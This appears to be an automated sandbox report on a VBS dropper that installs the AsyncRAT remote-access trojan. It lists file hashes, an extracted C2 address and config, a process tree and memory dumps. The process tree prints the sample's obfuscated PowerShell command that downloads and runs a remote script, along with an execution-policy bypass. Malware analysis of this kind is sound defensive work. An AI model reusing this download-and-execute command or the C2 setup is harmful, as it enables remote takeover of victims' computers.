Overview

overview

10

Static

static

KELCYML94182.vbs

windows7_x64

10

KELCYML94182.vbs

windows10_x64

10

Analysis

  • max time kernel
    149s
  • max time network
    145s
  • platform
    windows10_x64
  • resource
    win10-20220223-en
  • submitted
    26-02-2022 23:48

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    KELCYML94182.vbs

  • Size

    820B

  • MD5

    876924f6b4fe731b83fdd100bbf26cc2

  • SHA1

    411d8886c79f7acfb50663234b67f22f5bc48cdd

  • SHA256

    7ce24a33f4c22348ea1da16e5d04ac7936b8488a48371673343754e586069faf

  • SHA512

    f0173ca14f0066a458946484cd2be6126c70ac3ce1c221d3265e76b89dc38ae9285732539a97315664c20c199403f7bd9135b05f136f030bbdf8a090c690c543

Score
10/10
asyncratzain-work-newrat

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://sikabid.com/.Final2.txt

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

ZAIN-WORK-NEW

C2

pop5.ddns.net:6666

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • anti_vm

    false

  • bsod

    false

  • delay

    3

  • install

    false

  • install_folder

    %AppData%

  • pastebin_config

    null

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

    ratasyncrat
  • Async RAT payload 1 IoCs
    rat
  • Blocklisted process makes network request 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\KELCYML94182.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3484
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'Dow__lo--tri__g'.replace('__','n').replace('--','adS'),[Microsoft.VisualBasic.CallType]::Method,'h+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','ttps://sikab').Replace('################','id.com/.Final2.txt'))|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname
      2⤵
      • Blocklisted process makes network request
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3884
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\MpOAV.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4084
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & C:\Users\Public\MpAsDesc.ps1
          4⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:604
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
            5⤵
              PID:1928
    • C:\Windows\System32\WScript.exe
      C:\Windows\System32\WScript.exe "C:\ProgramData\WindowsHost\MpOAV.vbs"
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:3812
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & C:\Users\Public\MpAsDesc.ps1
        2⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:208
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          3⤵
            PID:3500
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
            3⤵
              PID:2500

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Initial Access

        Execution

        Persistence

        Privilege Escalation

        Defense Evasion

        Credential Access

        Discovery

        System Information Discovery

        1
        T1082

        Lateral Movement

        Collection

        Exfiltration

        Command and Control

        Impact

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\WindowsHost\MpOAV.vbs
          MD5

          c2e7af01cae2302a98a95ba03062c6e5

          SHA1

          aeff13341d4551d95b8a892ed2229a8b509bb39d

          SHA256

          641be49146f8a139244504b41a6343e0376ddf58c8d4b305f71652b904a5cc3f

          SHA512

          3719156a1c87d2fabf93f9bd1213ffbb43c50f63e2ecd6d24dc12f1c5bdb4ecd5a4c1f151c0fc9e96b9b106a29d3260519f8c102d8bab6e9454436cd3e55ad1c

          Download Submit
        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          MD5

          5f0b198807cbf23cc1fece5d8d37675b

          SHA1

          e8d651684243cf0cee9ec99e1dec4fbf4567b2b8

          SHA256

          524b4481f8783ebf4c58b7d890db6b888a6710c567af2be54af360480b1e4567

          SHA512

          73a04c3c945b4740750eb59857924b7808443b7c8ac9df6e3b2a3cd11840ed836c1196057c09106b3a9bf5da26fef95a16db410aa62810f7706a0b5f2d8cdfe7

          Download Submit
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          MD5

          2552000da6291c25e14f4aeb6c4e615f

          SHA1

          5a86729c17e394c0c1bd8365512dd8907a2ca5c9

          SHA256

          4c53438b94591a520064fa1bdd9b2a6f64911d0a11706bbe1da44a3bdef3c5b8

          SHA512

          69037e307be0017f4e8157128b7f4974acf9a9ec9dd1605f59eb6fcfdce1fbc0115302713538f8838123fceecc84a0bcde83e7cf7d9344da71541029545ecd45

          Download Submit
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          MD5

          7aa5c96ad933e3269a6d85adad1e97d7

          SHA1

          036b19469c199d4108b1ba3f94b08fe3da3824b5

          SHA256

          c52711a11be89b273b8432d420b1bcd59a9eac41457dfd5e278ca8d116d93e4a

          SHA512

          f5f00a2c4f9e79d322220c170f998b1d455ffe54419c3ab789ba366b7286eb5c8beff05a1f874d74221a0c6f81be75a768ea45987371c0e09d414083198609d9

          Download Submit
        • C:\Users\Public\MpAsDesc.ps1
          MD5

          cf076dc0f6753a5dafeae50cac3756de

          SHA1

          9d717184cbb3e6ba8b7d76b049f39e21126dc85a

          SHA256

          6e4f86132b82db5530f73453693f84f86494248a03cd983381eadf5727bb9378

          SHA512

          5010a8d44a8698420b4ed794db68f0076fdf22157531b9417e609c1ede15b01f5672bfc3ec12161ff936a3eff43313b084b566cca3d12947f5267eeb7a377258

          Download Submit
        • memory/208-227-0x000002657D343000-0x000002657D345000-memory.dmp
          Filesize

          8KB

          Download
        • memory/208-226-0x000002657D340000-0x000002657D342000-memory.dmp
          Filesize

          8KB

          Download
        • memory/208-225-0x00007FFA473A3000-0x00007FFA473A4000-memory.dmp
          Filesize

          4KB

          Download
        • memory/604-194-0x000002AFD2EE0000-0x000002AFD2EF2000-memory.dmp
          Filesize

          72KB

          Download
        • memory/604-189-0x000002AFB6DE0000-0x000002AFB6DE2000-memory.dmp
          Filesize

          8KB

          Download
        • memory/604-188-0x00007FFA460A3000-0x00007FFA460A4000-memory.dmp
          Filesize

          4KB

          Download
        • memory/604-190-0x000002AFB6DE3000-0x000002AFB6DE5000-memory.dmp
          Filesize

          8KB

          Download
        • memory/1928-202-0x00000000737DE000-0x00000000737DF000-memory.dmp
          Filesize

          4KB

          Download
        • memory/1928-209-0x0000000006F30000-0x0000000006F4E000-memory.dmp
          Filesize

          120KB

          Download
        • memory/1928-195-0x0000000000400000-0x0000000000412000-memory.dmp
          Filesize

          72KB

          Download
        • memory/1928-214-0x0000000007600000-0x000000000764B000-memory.dmp
          Filesize

          300KB

          Download
        • memory/1928-213-0x00000000075A0000-0x0000000007600000-memory.dmp
          Filesize

          384KB

          Download
        • memory/1928-203-0x0000000005800000-0x0000000005801000-memory.dmp
          Filesize

          4KB

          Download
        • memory/1928-204-0x0000000005AE0000-0x0000000005B7C000-memory.dmp
          Filesize

          624KB

          Download
        • memory/1928-205-0x0000000006080000-0x000000000657E000-memory.dmp
          Filesize

          5.0MB

          Download
        • memory/1928-206-0x0000000005BF0000-0x0000000005C56000-memory.dmp
          Filesize

          408KB

          Download
        • memory/1928-207-0x0000000006E80000-0x0000000006EF6000-memory.dmp
          Filesize

          472KB

          Download
        • memory/1928-208-0x0000000006E00000-0x0000000006E7E000-memory.dmp
          Filesize

          504KB

          Download
        • memory/1928-212-0x00000000073A0000-0x0000000007430000-memory.dmp
          Filesize

          576KB

          Download
        • memory/1928-210-0x0000000006FB0000-0x0000000007300000-memory.dmp
          Filesize

          3.3MB

          Download
        • memory/1928-211-0x0000000007380000-0x000000000738A000-memory.dmp
          Filesize

          40KB

          Download
        • memory/2500-238-0x00000000737DE000-0x00000000737DF000-memory.dmp
          Filesize

          4KB

          Download
        • memory/2500-239-0x00000000057F0000-0x00000000057F1000-memory.dmp
          Filesize

          4KB

          Download
        • memory/3884-167-0x000001F5C1158000-0x000001F5C115A000-memory.dmp
          Filesize

          8KB

          Download
        • memory/3884-119-0x000001F5C3160000-0x000001F5C3182000-memory.dmp
          Filesize

          136KB

          Download
        • memory/3884-146-0x000001F5C1156000-0x000001F5C1158000-memory.dmp
          Filesize

          8KB

          Download
        • memory/3884-130-0x000001F5C1153000-0x000001F5C1155000-memory.dmp
          Filesize

          8KB

          Download
        • memory/3884-128-0x000001F5C1150000-0x000001F5C1152000-memory.dmp
          Filesize

          8KB

          Download
        • memory/3884-127-0x00007FFA460A3000-0x00007FFA460A4000-memory.dmp
          Filesize

          4KB

          Download
        • memory/3884-124-0x000001F5C3310000-0x000001F5C3386000-memory.dmp
          Filesize

          472KB

          Download